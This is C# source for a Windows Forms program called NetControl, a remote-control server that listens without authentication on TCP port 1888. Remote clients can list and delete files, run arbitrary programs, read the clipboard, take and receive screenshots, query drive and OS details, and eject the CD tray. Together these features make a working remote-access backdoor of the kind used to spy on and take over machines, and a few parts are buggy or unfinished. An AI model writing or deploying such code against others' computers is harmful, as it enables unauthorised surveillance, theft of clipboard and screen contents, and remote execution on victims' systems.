using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Threading;
using System.Management;
using System.Drawing.Imaging;
using System.Runtime.InteropServices;


namespace NetControl
{
    public partial class Form1 : Form
    {

        private Socket sock = null;
        private Socket newsock = null;
        private TcpListener tcpL = null;
        private TcpListener newtcpL = null;
        private int port = 1888;
        private string msg = "";
        private string clientIP = "";
        private bool DoorOpened = false;
        private NetworkStream netstream = null;
        private Thread threadMain;

        [DllImport("winmm.dll", EntryPoint = "mciSendString", CharSet = CharSet.Auto)]
        public static extern int mciSenString(
            string lpstrCommand,
            string lpstrReturnstring,
            int uReturnLength,
            int hwndCallback
            );
        
        
        public Form1()
        {
            InitializeComponent();
        }

        private void Form1_Load(object sender, EventArgs e)
        {

        }

        private void btn_start_Click(object sender, EventArgs e)
        {
            tcpL = new TcpListener(port);
            tcpL.Start();
            rtbox_show.AppendText("wait for connection \r\n");
            threadMain = new Thread(new ThreadStart(receive));
            threadMain.IsBackground = true;
            threadMain.Start();
        }

        delegate void D_Output(string msg);

        private void Output(string msg)
        {
            rtbox_show.Text = msg;
        }

        private void receive()
        {
            while (true)
            {
                sock = tcpL.AcceptSocket();
                if (sock.Connected)
                {
                    IPEndPoint ipendPoint = (IPEndPoint)sock.RemoteEndPoint;
                    clientIP = ipendPoint.Address.ToString();
                    Invoke(new D_Output(Output),new object[]{"Connected from " + clientIP + "\r\n"});
                    //rtbox_show.AppendText("Connected from " + clientIP + "\r\n");
                    netstream = new NetworkStream(sock);
                    round(ref sock, ref netstream);
                }
            }
        }

        private void round(ref Socket sock, ref NetworkStream netStream)
        {
            while (true)
            {
                string myCMD = "";
                string myCMDPara = "";
                string CMD = "";
                byte[] msgByte = new byte[1024];
                netStream.Read(msgByte, 0, msgByte.Length);
                string myMSG = System.Text.Encoding.UTF8.GetString(msgByte);
                int x = myMSG.IndexOf("\r\n",0);
                if (x == -1) {
                    // TODO: l

                }
                else
                {
                    CMD = myMSG.Substring(0, x);
                }
                    string [] arry;
                arry = CMD.Split(' ');
                myCMD = arry[0];
                Invoke(new D_Output(Output), new object[] { myCMD + "\r\n" });

                if(arry.Length > 1 )
                {
                    myCMDPara = arry[1];
                }

                switch(myCMD)
                {
                    case "list":
                        {
                            msg = list(myCMDPara);
                            msgToClient(ref netStream,msg);
                            break;
                        }
                    case "del":
                        {
                           msg = del(myCMDPara);
                            msgToClient(ref netStream,msg);
                            break;
                        }
                    case "copy":
                        {
                            msg = copy(myCMDPara);
                            msgToClient(ref netStream,"Finished !");
                            break;
                        }
                    case "driverinfo":
                        {
                            msg = driverinfo(myCMDPara);
                            msgToClient(ref netStream,msg);
                            break;
                        }
                    case "msg":
                        {
                            MessageBox.Show(myMSG);
                            break;
                        }
                    case "run":
                        {
                            msg = run(myCMDPara);
                            msgToClient(ref netStream,msg);
                            break;
                        }
                    case "url":
                        {
                            msg = url(myCMDPara);
                            msgToClient(ref netStream,msg);
                            break;
                        }
                    case "winversion":
                        {
                            msg = winversion();
                            msgToClient(ref netStream,msg);
                            break;
                        }
                    case "cdcontrol":
                        {
                            msg = cdcontroll();
                            msgToClient(ref netStream,msg);
                            break;
                        }
                    case "getcliptext":
                        {
                            msg = getcliptext();
                            msgToClient(ref netStream,msg);
                            break;
                        }
                    case "getScreen":
                        {
                            String path = "C:\\windows\\screen.jpg";
                            getScreen(path);
                            newConnect(path);
                            string check = del(path);
                            Invoke(new D_Output(Output), new Object[] { "file " + path + "deleted \r\n" });
                            break;                        
                        }
                }

            }
        }

        private void msgToClient(ref NetworkStream netStream, string Msg)
        {
            byte[] byteData = new byte[1024];
            byteData = System.Text.Encoding.UTF8.GetBytes(Msg.ToCharArray());
            try
            {
                netStream.Write(byteData, 0, byteData.Length);
                netStream.Flush();
            }
            catch
            {
            }
        }

        private string list(string path)
        {
            try
            {
                string[] str = new string[1024];
                string dir = null;
                for (int i = 0; i < Directory.GetDirectories(path).Length; i++)
                {
                    str[i] = Directory.GetDirectories(path)[i];
                    dir = dir + "Dir : " + "[" + str[i] + "]" + "\r\n";
                }
                for (int i = 0; i < Directory.GetFiles(path).Length; i++)
                {
                    str[i] = Directory.GetFiles(path)[i];
                    dir = dir + "File: " + str[i] + "\r\n";
                }
                return dir;
            }
            catch (Exception ee)
            {
                return (ee.Message);
            }
        }

        private string del(string path)
        {
            try
            {
                File.Delete(path);
                return "file deleted";
            }
            catch (Exception ee)
            {
                return (ee.Message);
            }
        }

        private string copy(string path)
        {
            return "copy";
        }

        private string driverinfo(string path)
        {
            ManagementObject mo;// = new ManagementObject();
            string[] driveType = Directory.GetLogicalDrives();
            string driveList = "";
            foreach (string drive in driveType)
            {
                mo = new ManagementObject(
                    "Win32_LogicalDisk='" + drive.TrimEnd('\\') + "'"
                    );
                switch (Convert.ToInt32(mo.Properties["DriveType"].Value))
                {
                    case 0 :
                        driveList = drive.Substring(0, 1) + " Unknown driver type \r\n";
                        break;
                    case 1 :
                        driveList = driveList + drive.Substring(0, 1) +
                            " no root dir\r\n";
                        break;
                    case 2 :
                        driveList = driveList + drive.Substring(0, 1) +
                            " Removale \r\n";
                        break;
                    case 3 :
                        driveList = driveList + drive.Substring(0, 1) +
                            " Hard disk \r\n";
                        break;
                    case 4 :
                        driveList = driveList + drive.Substring(0, 1) +
                            " Network disk\r\n";
                        break;
                    case 5 :
                        driveList = driveList + drive.Substring(0, 1) +
                            " CD-ROM \r\n";
                        break;
                    case 6 :
                        driveList = driveList + drive.Substring(0, 1) +
                            " RAM driver\r\n";
                        break;
                }
            }
            return driveList;
        }

        private string run(string path)
        {
            try
            {
                System.Diagnostics.Process.Start(path);
                return "Application is running";
            }
            catch (Exception ee)
            {
                return (ee.Message);
            }
        }

        private string url(string url)
        {
            try
            {
                System.Diagnostics.Process.Start(url);
                return "homepage opend";
            }
            catch (Exception ee)
            {
                return (ee.Message);
            }
        }

        private string winversion()
        {
            string winVer_Platform =
                Environment.OSVersion.Platform.ToString();
            string winVer_PlatformV =
                Environment.OSVersion.Version.Major.ToString();
            string winVer_bulid =
                Environment.OSVersion.Version.Build.ToString();
            string winVer = "Platform :" +
                winVer_Platform + "\r\n" +
                "PlatformVersion : " +
                winVer_PlatformV +
                "Build :" + winVer_bulid +
                "\r\n";
            return winVer;
        }

        private string cdcontroll()
        {
            if(!DoorOpened)
                mciSenString("set cdaudio door open","",0,0);
            if(DoorOpened)
                mciSenString("set cdauadio door closed","",0,0);
            DoorOpened = !DoorOpened;
            return "Successful";
        }

        private string getcliptext()
        {
            try
            {
                IDataObject cdo = Clipboard.GetDataObject();

                if (cdo != null)
                {
                    if (cdo.GetDataPresent(DataFormats.Text))
                    {
                        string tData = cdo.GetData(DataFormats.Text).ToString();
                        return tData;
                    }
                    else
                    {
                        return "Nothing!";
                    }
                }
                else
                {
                    return "Empty";
                }
            }
            catch (Exception ee)
            {
                return (ee.Message);
            }
        }

        [System.Runtime.InteropServices.DllImport("gdi32.dll")]
        private static extern bool BitBlt(
            IntPtr hdcDest,
            int nXDest,
            int nYDest,
            int nWidth,
            int nHeight,
            IntPtr hdcSrc,
            int nXsrc,
            int nYsrc,
            System.Int32 dwRop
            );
        [System.Runtime.InteropServices.DllImport("gdi32.dll")]
        private static extern IntPtr CreateDC(
            string lpszDriver,
            string lpszDevice,
            string lpszOutput,
            IntPtr lplnitData
            );
        private Bitmap myImage = null;
        private void getScreen(string ImagePath)
        {
            IntPtr dc1 = CreateDC("DISPLAY", null, null, (IntPtr)null);
            Graphics g1 = Graphics.FromHdc(dc1);
            myImage = new Bitmap(Screen.PrimaryScreen.Bounds.Width,
                      Screen.PrimaryScreen.Bounds.Height,
                      g1);
            Graphics g2 = Graphics.FromImage(myImage);
            // IntPtr dc3 = g1.GetHdc();
            IntPtr dc2 = g2.GetHdc();
            BitBlt(dc2,0,0,Screen.PrimaryScreen.Bounds.Width,
                   Screen.PrimaryScreen.Bounds.Height,
                   dc1,
                   0,
                   0,
                   13369376
            );
            //g1.ReleaseHdc(dc3);
            g2.ReleaseHdc(dc2);
            myImage.Save(ImagePath,ImageFormat.Jpeg);
        }

        private void newConnect(string filePath)
        {
            newtcpL = new TcpListener(port + 1);
            newtcpL.Start();
            newsock = newtcpL.AcceptSocket();
            if (newsock.Connected)
            {
                NetworkStream netStream_n = new NetworkStream(newsock);
                sendFile(ref netStream_n, filePath);
                netStream_n.Close();
                newsock.Close();
                newtcpL.Stop();
            }
        }

        private void sendFile(ref NetworkStream netStream_n, string myFilePath)
        {
            FileStream fs = new FileStream(myFilePath,
                                    FileMode.Open,
                                    FileAccess.Read);
            byte[] bb = new byte[8];
            while(fs.Read(bb,0,bb.Length)!= 0)
            {
                netStream_n.Write(bb,0,bb.Length);
                netStream_n.Flush();
                bb = new byte[8];
            }
            fs.Close();
        }

        private void btn_stop_Click(object sender, EventArgs e)
        {
            try
            {
                threadMain.Abort();
                netstream.Close();
            }
            catch
            { }
            try
            {
                sock.Close();
            }
            catch
            { }
            try
            {
                tcpL.Stop();
                rtbox_show.AppendText("stoped \r\n");
            }
            catch(Exception ee)
            {
                rtbox_show.AppendText(ee.Message + "\r\n");
            }


        }


    }
}